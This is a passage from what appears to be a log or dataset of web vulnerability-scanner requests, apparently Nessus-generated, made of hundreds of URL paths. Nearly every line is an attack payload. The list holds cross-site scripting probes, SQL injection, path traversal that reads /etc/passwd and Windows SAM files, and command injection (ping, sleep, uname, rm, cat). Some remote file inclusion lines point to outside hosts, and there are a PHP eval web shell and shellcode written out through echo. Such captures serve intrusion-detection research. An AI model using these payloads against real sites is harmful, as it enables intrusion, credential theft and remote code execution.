src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qczkquis.mscgi?<script>document.cookie=\"testkwlg=5591;\"</script>\n/en-us/7o5qp766.mscgi?<script>cross_site_scripting.nasl</script>\n/cgi-bin/pfdispaly.cgi?../../../../../../etc/passwd\n/h5sc3gxy.x?<script>cross_site_scripting.nasl</script>\n/xanax-description/\n/hipkz026.fts?<script>document.cookie=\"testyrbs=2855;\"</script>\n/scriptomania_v2/\n/scripts/nsiislog.dll\n/javascript/25.exe\n/en-us/33y9gcqq.jspa?<script>document.cookie=\"testnvxc=4301;\"</script>\n/more.php?id=1'\n/t7tm4m0b.cfc?<script>cross_site_scripting.nasl</script>\n/search-results.dot?search_query=<script>alert(413796083533)</script>\n/help.php?q=\"del\\x09q46669995\\x09#\n/scripts/shop.plx/page=nessus1521425795\n/en-us/account/phptonuke.php?filnavn=/etc/passwd\n/javascript/player.exe\n/d765w06j.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jdx255ea.pl?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/lostpasswd/\n/javascript/sox.exe\n/examples/jsp/sessions/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/fc9t54l7.aspx?<script>document.cookie=\"testggad=2000;\"</script>\n/scripts/t769qwej0llr.cfm\n/javascript/cgi.exe\n/index.php?id=yfbenmzg_m'\n/javascript/papers.exe\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331909360\n/https-admserv/bin/index?/<script>alert(document.cookie)</script>\n/javascript/1001.exe\n/main.php?logout='\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- \n/en-us/account/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/scripts/xuicksry9grj.sh\n<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/edzaia0i.do?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/popup.php?include_path=/etc/passwd\\x00\n/ast_description/\n/9kr0ih0v.kspx?<script>document.cookie=\"testzgnm=1183;\"</script>\n/login.php/login.php?lang=../../../../../ubbc.js\\x00\n/javascript/x.exe\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331904229\n/lsoix5h3.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a0imiuf1.htm?<script>document.cookie=\"testxqrn=4654;\"</script>\n/en-us/n9xlumt5.pl?<script>cross_site_scripting.nasl</script>\n<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/en-us/account/popup.php?include_path=/etc/passwd\\x00\n/j734qobz.fts?<script>cross_site_scripting.nasl</script>\n/mpcgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/papert's_principle/\n/javascript/active.exe\n/qhvu0pdg.pl?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/cgi-914/ion-p.exe?page=c:\\winnt\\repair\\sam\n/xfkun1ku.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/setup.php\n/ht8pn8uq.pl?<script>cross_site_scripting.nasl</script>\n/weq93ppb.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.96:8080/4dckqcc0acprbz?\n/recordings/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/7dbjwpw6.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/javascript/signin.exe\n/esmozg5d.fts?<script>cross_site_scripting.nasl</script>\n/scripts/www/delivery/ac.php?bannerid=-290+or+1=1\n/ddoworrl.cfm?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/main.php?logout=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/hwxugbkmva\"\n/examples/jsp/jsp2/el/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/manager/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/jsp2/el/search.pl?form=../../../../../../etc/passwd\\x00\n/top.php?stuff=\"&uname >q38114689 #\n/examples/jsp/colors/index.php?entry='\n/0rufe52p.php?<script>cross_site_scripting.nasl</script>\n/scripts/gbadmin.cgi?action=change_adminpass\nftp://192.168.27.102/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/xssthreat/\n/p043snfr.jspa?<script>cross_site_scripting.nasl</script>\n/webcgi/ion-p?page=../../../../../etc/passwd\n/jscript.php?my_ms[root]=http://192.168.202.118:8080/ghl9il??\n/rbec2ohx.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.war\n/3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../\n/top.php?stuff='&uname\\x09#\n/help.php?q=;del\\x09q81281166\\x09#\n/de3v2dd9.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vac1l5vm.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jdx255ea.jsp?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/colors/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/mv8wxfy9.cgi?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/\"rss+security\"/\n/dir_thatware/config.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz?'\n/8t9v8k7x.idc?<script>document.cookie=\"testhvje=9403;\"</script>\n/javascript/viewcvs.exe\n/static//\\..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini\n/subscriptions.jhtml\n/scripts/listrec.pl?app=qmh-news&template=;ls /etc|\n/cgi-bin/js/scripts.php?load=/boot.ini\\x00\n/javascript/true.exe\n/rbec2ohx.x?<script>cross_site_scripting.nasl</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/rymojltfjq0+>+/dev/null+&'); function v\n/cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>\n/6wb70v0b.pl?<script>cross_site_scripting.nasl</script>\n/subscriptions.cgi\n/gepi/gestion/savebackup.php?filename=http://cirt.net/rfiinc.txt?&cmd=cat/etc/passwd\n/mv8wxfy9.exe?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/help.php?q=\"\\x0adel\\x09q73265631\\x09#\n/scripts/wsnsa.dll/wservice=wsbroker1/webutil/ping.p\n/s7qus4g3.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i7prbs22.mscgi?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/nyjgaorz.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/conscript_gifts/\n/cacti/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/cgi-bin/index.php?id='union/**/select/**/0,0,1673700990,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/top.php?stuff='\\x0ddel q83658658 #\n/scripts/wxrdqnkjuwmu.html\n/cgi-bin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/h21y8w52.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=tshujzjrl3ejhp0_3\n/main.php?logout=&ver >q46544641&rem \n/azcrfs8d.nsf?<script>document.cookie=\"testjpdr=9205;\"</script>\n/<?php eval($_post['q86556725']);?>\n/javascript/22.exe\n/en-us/ddoworrl.cfc?<script>document.cookie=\"testvlau=8517;\"</script>\n/0rufe52p.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/showproduct.php?product=1'\n/h21y8w52.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/forumdisplay.php?fid=21\"><script>x</script>\n/javascript/webdb.exe\n/examples/jsp/sessions/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/examples/servlets/servlet/phptonuke.php?filnavn=/etc/passwd\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--&blogid=1\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.dll\n/htbin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/popup.php?poll_ident=<script>alert(\"wvs-xss-magic-string-411445575285\")</script>\n/recordings/include/sql.php?include_path=/etc/passwd\\x00\n/a0imiuf1.idc?<script>document.cookie=\"testxqrn=4654;\"</script>\n/scripts/ui/login?user=nessus-1331909161\n/top.php?stuff=\"ver\\x09>q12423295&rem\\x09\n/manager/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\\x00\n/top.php?stuff='\\x0duname\\x09>q88128927\\x09#\n/scriptome/\n/examples/jsp/num/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/gy23xnjq.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/ddoworrl.htm?<script>document.cookie=\"testvlau=8517;\"</script>\n/igtf0zon.exe?<script>cross_site_scripting.nasl</script>\n/vac1l5vm.x?<script>cross_site_scripting.nasl</script>\n/atlantisrebornagain_transcript/\n/6qbynt4f.dll?<script>cross_site_scripting.nasl</script>\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/4dckqcc0acprbz??\n/examples/jsp/jsp2/el/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/cgi-bin/index.php?op=default&date=200607' union select 1,199642765,1,1,1,1,1,1,1,1--&blogid=1\n/m4kkjf8l.exe?<script>document.cookie=\"testyglc=8988;\"</script>\n/phpmyadmin/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/scripts/printenv.tmp\n/top.php?stuff='\\x0asleep 7 #\n/scripts/?p=subscribe\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(367458602)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(342823857)</script>\n/scripts/n4p4f4gtbhia.cfm\n/examples/jsp/num/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/de3v2dd9.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/calendar_admin.pl?config=|cat /etc/passwd|\n/manager/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/manager/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/odzk29aa.asp?<script>document.cookie=\"testtfvh=2141;\"</script>\n/viewcat.php?catid=21abc'&s_itemnum=&s_user_id=&s_title=&s_description=&s_asking_min=&s_asking_max=&s_quantity=&s_city_town=&s_state_province=\n/zmvq66jy.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyvbv05h.nsf?<script>document.cookie=\"testftxz=5980;\"</script>\n/javascript/showpost.exe\n/rpxyx07v.idc?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/main.php?stuff=\"&del\\x0cq64367569&rem\\x0c\n/examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jugo3scd]));die;/*\n/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/cgi-bin?username=\"<script>foo</script\n/..%5c..%5c..%5c..%5c..%5c../windows/repair/sam\n/recordings/shoutbox.php?conf=../../../../../../../../etc/passwd\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331919214,1014126559 --\n/examples/jsp/error/store.php?crn=42'&action=show&show_products_mode=cat_click\n/examples/jsp/colors/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/examples/jsp/num?username=\"<script>foo</script\n/scripts/index.php?edit=nonexistant859870284\n/scripts/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd\\x00index.html\n/help.php?q=';del q95782248 #\n/examples/jsp/cal/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/cgi-home/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/top.php?stuff=\"&ver >q19468613&rem \n/0w155a7c.pl?<script>cross_site_scripting.nasl</script>\n/recordings/help.php?section='qualiteam_xcart_sql_xss.nasl\n/examples/jsp/jsp2/el/starnet/addons/slideshow_full.php?album_name='1654493777\n/help.php?q=\"del\\x0cq88163734&rem\\x0c\n/rpxyx07v.htm?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/javascript/tcl.exe\n/script/ident/disconnect.php?path_inc=@rfiurl\n/javascript/codec.exe\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--\n/cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini\n/cgi-bin/texis.exe/nessus\n/save.php?file_save=/etc/passwd\n/scripts/1331923142-ror_session_fixation.nasl\n/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1\n/scripts/wx4z4gedhl0l.cfm\n/scripts/check-lom.php?etcdir=@rfiurl\n/main.php?logout=';sleep 11 #\n/javascript/htpasswd.cs\n/rpxyx07v.kspx?<script>document.cookie=\"testbnli=1975;\"</script>\n/topsitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/javascript/outreach.exe\n/examples/jsp/colors/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/java_script/\n/top.php?stuff=\"del q61611865&rem \n/jdx255ea.nsf?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/examples/jsp/sessions/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/main.php?stuff=\"uname\\x09>q84368944\\x09#\n/javascript/oaerrordetailpage.exe\n/examples/jsp/sessions/shoutbox.php?conf=../../../../../../../../etc/passwd\n/cacti/mapserv.exe?map=mapserver_detect.nasl.map\n/top.php?stuff=\"ping;-w;9000;-n;1;1.2.3.4&rem;\n//<body><script/src=\"http://www.example.com/test?rnd=q72968617\"></script>\n/rpc.php?q=\\\"><script>alert(document.cookie)</script>\n/main.php?logout=\"ping,-w,7000,-n,1,4.3.2.1|rem,\n/examples/jsp/jsp2/jspx/index.php?entry='\n/cgi-bin/index.php?id=hw828khs0f'\n/eventum_xss/\n/examples/jsp/sessions/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/en-us/h5sc3gxy.html?<script>cross_site_scripting.nasl</script>\n/www/delivery/ac.php?bannerid=-1332008323+or+1=1+--+';passthru(base64_decode($_server[http_nessus_tbftd0nk]));die;/*\n/mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini\n/scripts/cfgwiz.exe\n/cgi-bin/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/examples/servlets/servlet/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/scripts/yfmo7jpwvpv1.php\n/help.php?q=ver\\xa0>q87371136&rem\\xa0\n/cgi-win/r.cgi?file=../../../../../../../../../../etc/passwd\n/phpmyadmin/../phpmyadmin.tar.gz\n/examples/jsp/colors/forum_2.php?msg=10&return=<script>foo</script>\n/dda2qr7j.htm?<script>cross_site_scripting.nasl</script>\n/main/inc/lib/fckeditor/editor/plugins/imagemanager/editor.php?img=\"><script>alert(412165577676)</script><\"\n/?<script>document.cookie=\"testjvvf=7721;\"</script>\n/examples/jsp/cal/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/scripts/rih28haesl0j.cgi\n/help.php?q=&del;q11223182&rem;\n/top.php?stuff=ver&rem;\n/en-us/33y9gcqq.cgi?<script>document.cookie=\"testnvxc=4301;\"</script>\n/examples/jsp/jsp2/el/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/g3w7y7u5.pl?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/cgi-bin/cleartrust/ct_logon.asp?ctloginerrormsg=<script>alert(1)</script>\n/tuwjta1w.exe?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee612207409.~1~\n/x7pclv4s.idc?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/r3le3om5.dll?<script>cross_site_scripting.nasl</script>\n/cgi-bin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/javascript/copy.exe\n/scripts/login.php?url=editgedcoms.php\n/en-us/<script>document.cookie=\"testttvs=7163;\"</script>\n/0u75ldxq.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadminsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/download.php?id='\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1990709357,1464629176,1,1,1,1,1--&blogid=1\n/azcrfs8d.kspx?<script>document.cookie=\"testjpdr=9205;\"</script>\n/nyvbv05h.asp?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/examples/servlets/servlet/embed/day.php?path=/etc/passwd\\x00\n/javascript/youtube.exe\n/iv5vkgam.cfm?<script>document.cookie=\"testfosd=94;\"</script>\n/examples/jsp/num/fxm.exe\n/6qbynt4f.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/dda2qr7j.nsf?<script>cross_site_scripting.nasl</script>\n/cgi-sys/vssetcookie.exe\n/j4drbkil.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/loginmanager.php?path=@rfiurl\\x00\n/top.php?stuff=ping;-w;9000;-n;1;4.3.2.1|rem;\n/5o9zq43e.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/examples/jsp/num/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/scripts/h3d1n9eaqxv3.cfm\n/scripts/search.php\n/examples/jsp/sessions/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/33y9gcqq.nsf?<script>document.cookie=\"testnvxc=4301;\"</script>\n/xfkun1ku.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/clk;38417351;7163019;g/\n/0u75ldxq.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6n7aacgg.do?<script>cross_site_scripting.nasl</script>\n/javascript/xxx.exe\n/manager/protection.php?action=logout&siteurl=/etc/passwd\n/examples/jsp/checkbox/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/bin/htimage.exe/path/filename?2,2\n/examples/servlets/servlet/data/fetch.php?page='\n/cgis/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/examples/jsp/checkbox/index.cfm?fuseaction=category.display&category_id='\n/javascript/includes.exe\n/javascript/hosting.exe\n/0z575z74.kspx?<script>document.cookie=\"testuhsv=9753;\"</script>\n/main.php?stuff=\"ver\\xa0>q33347165&rem\\xa0\n/iktok2bw.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8t9v8k7x.asp?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/bugs/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\n/cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd\n/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/miz4r5hz.php?<script>document.cookie=\"testviqu=1270;\"</script>\n/cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/help.php?q=\"ping -w 11000 -n 1 4.3.2.1|rem \n/help.php?q='\\x0ddel\\x09q24981853\\x09#\n/h5i6crm3.jspa?<script>document.cookie=\"testlihk=7070;\"</script>\n/egaet53a.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/7u1pb2xi.cfm?<script>document.cookie=\"testlwwz=718;\"</script>\n/vjbrrppi.htm?<script>cross_site_scripting.nasl</script>\n/de3v2dd9.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testtrlh=3672;\"</script>\n/zuihld5m.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/index.cfm?fuseaction=category.display&category_id='\n/htbin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/test.shtml?<script>alert('vulnerable')</script>=x\n/en-us/33y9gcqq.x?<script>document.cookie=\"testnvxc=4301;\"</script>\n/modules.php?op=modload&name=xforum&file=member&action=viewpro&member=<script>alert('vulnerable')</script>\n/examples/jsp/cal/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/scripts_sitemanager/\n//<body><script/src=\"http://www.example.com/test?rnd=q61112548\"></script>\n/scripts/ui/login?user=nessus-1331922061\n/e9rx3ya4.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/index.php/index.html\n/javascript/zimbra.exe\n/config.php?path[docroot]=/etc/passwd\\x00\n/main.php?stuff=\\x0auname\\x09>q82381573\\x09#\n/ap58k3ci.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='&del q76213281 #\n/valium-prescription/\n/help.php?q=&uname\\x09>q36668797\\x09#\n/javascript/embedded.exe\n/admin/common/script.js.php.old\n/txtsubscriptions/\n/help.php?q=;rm\\x09q17568111\\x09#\n/cacti/way-board/way-board.cgi?db=/etc/passwd\\x00\n/main.php?logout='\\x0asleep 9 #\n/supporter/tupdate.php?groupid=change&sg='\n/fc9t54l7.cgi?<script>document.cookie=\"testggad=2000;\"</script>\n/phpmyadmin/add_url.htm?node=<script>alert('xss')</script>\n/cacti/index.php?entry='\n/main.php?logout='\\x0auname\\x09>q55586739\\x09#\n/cgi-exe/.htpasswd\n/n1afe1y6.jsp?<script>cross_site_scripting.nasl</script>\n/w2kandntsecurityeventlogdescriptions/\n/examples/jsp/colors/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/en-us/oie504mr.jspa?<script>document.cookie=\"testtpby=7052;\"</script>\n/scs86g1p.dll?<script>document.cookie=\"testquyx=2820;\"</script>\n/include/default_header.php?script_path=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/o35zot2r.pl?<script>cross_site_scripting.nasl</script>\n/gy23xnjq.cfm?<script>cross_site_scripting.nasl</script>\n/javascript/gallery.exe\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --\n/scripts/blog.php?f=&newmessage=&newremember=1&adminuser=1&newusername=php_update_var_overwrite.nasl\n/examples/jsp/num/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n//<body><script/src=\"http://www.example.com/test?rnd=q54714766\"></script>\n/scripts/1331922077-ror_session_fixation.nasl\n/fa8p8lr8.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/fc9t54l7.cfc?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/examples/servlets/servlet/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/javascript/buy.exe\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/4dckqcc0acprbz?\n/33y9gcqq.x?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/examples/servlets/servlet/a1disp3.cgi?/../../../../../../etc/passwd\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1630321351,0,0,0,0,0--\n/help.php?q=\"ver >q41912626&rem \n/en-us/account/data/fetch.php?page='\n/examples/servlets/servlet/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/byrg33fw.mscgi?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/javascript/lib.exe\n/rbec2ohx.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t578vqea.cfc?<script>document.cookie=\"testsory=7676;\"</script>\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331918989')</script>\n/examples/jsp/jsp2/el/profil.php?id=1 <script>foo</script>\n/add_comment.php?id=\"><script>alert(411315573095)</script><\"\n/t3af3tdz.html?<script>cross_site_scripting.nasl</script>\n/writingscripts/\n/bin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/scripts/calendar.php?month=' union select 1,1,'1331922100','calendarix_month_sql_injection.nasl',1 #\n/examples/jsp/colors/texis.exe/?-dump\n/javascript/pixel.exe\n/scriptsadmin/index.php\n/javascript/geeklog.exe\n/main.php?stuff=\"&ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/j734qobz.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/viewpage.php?file=/etc/passwd\n/w4996nr0.fts?<script>document.cookie=\"testttvs=7163;\"</script>\n/h5sc3gxy.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ddoworrl.pl?<script>document.cookie=\"testvlau=8517;\"</script>\n/scripts/qbch5ojumj32.php\n/en-us/account/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/xss_500x214/\n/subscriptions.ico\n/lmw4r201.jspa?<script>document.cookie=\"testwews=8477;\"</script>\n/..../..../..../..../..../..../..../..../..../winnt/win.ini\n/en-us/33y9gcqq.pl?<script>document.cookie=\"testnvxc=4301;\"</script>\n/fpnpp5zg.php3?<script>document.cookie=\"testyias=101;\"</script>\n/main.php?stuff=;del q28712723 #\n/scripts/event_view.php?eid=34 union select 634727808\n/cgi-bin/smpwservicescgi.exe\n/n1afe1y6.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/manager/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/examples/servlets/servlet/more.php?id=1'\n/u8yiqilu.cfc?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/lmw4r201.dll?<script>document.cookie=\"testwews=8477;\"</script>\n/scriptaculous-1/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+68+c0+a8+ca+66+68+02+00+ce+ad+8b+dc+6a+10+53+55+ff+d0+83+c4+2c+95+59+5a+51++>>esbq\n/1qwv2p5p.fts?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/scripts/pssdseehtgdp.shtml\n/v3axg1p8.mscgi?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/main.php?logout=\"&sleep 10 #\n/scripts/forums.asp?ifor=duforum_sql_injections.nasl'\n/jscript.php?my_ms[root]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/en-us/7o5qp766.pl?<script>cross_site_scripting.nasl</script>\n/dslpwt15.cgi?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/cgi-sys/ppdscgi.exe\n/cacti/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/webcgi/msmmask.exe?mask=/junk334\n/cgi-bin/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/examples/jsp/cal/protection.php?action=logout&siteurl=/etc/passwd\n/script/tick/test.php?path_to_code=http://192.168.202.118:8080/2aibfaczmac8?\n/recordings/perl.exe?-v\n/en-us/7o5qp766.php?<script>cross_site_scripting.nasl</script>\n/scripts/d3z7yywpyeoa.inc\n/stat/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/<script>document.cookie=\"testwtbo=4831;\"</script>\n/recordings/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/javascript/record.exe\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/whmch8ftkt7kv?\n/jdx255ea.pl?<script>document.cookie=\"testziyq=5055;\"</script>\n/news/scripts/news_page.php?script_path=http://cirt.net/rfiinc.txt??\n/en-us/dda2qr7j.pl?<img 